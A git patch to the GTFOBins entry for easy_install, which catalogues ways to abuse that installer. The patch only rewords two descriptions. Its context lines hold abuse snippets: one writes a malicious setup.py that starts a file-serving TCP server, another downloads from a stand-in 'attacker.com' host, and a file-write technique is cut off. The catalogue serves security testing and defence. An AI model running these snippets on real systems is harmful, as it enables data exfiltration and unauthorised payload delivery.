From f8dab26569bfcc96013dfe6e933a03fbca7d1aa3 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Sat, 29 Sep 2018 10:47:19 +0100 Subject: [PATCH] Rephrase easy_install descriptions --- _gtfobins/easy_install.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/_gtfobins/easy_install.md b/_gtfobins/easy_install.md index d7bf7c6..fedc4c5 100644 --- a/_gtfobins/easy_install.md +++ b/_gtfobins/easy_install.md @@ -37,7 +37,7 @@ functions: ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py easy_install $TF download: - - description: Fetch a remote file via HTTP GET request. It needs an absolute local file path. + - description: Fetch a remote file via HTTP GET request. The file path must be absolute. code: | export URL=http://attacker.com/file_to_get export LFILE=/tmp/file_to_save @@ -49,7 +49,7 @@ functions: r.urlretrieve('$URL', '$LFILE')\"\"\")" > $TF/setup.py pip install $TF file-write: - - description: It needs an absolute local file path. + - description: The file path must be absolute. code: | TF=$(mktemp -d) echo "import os;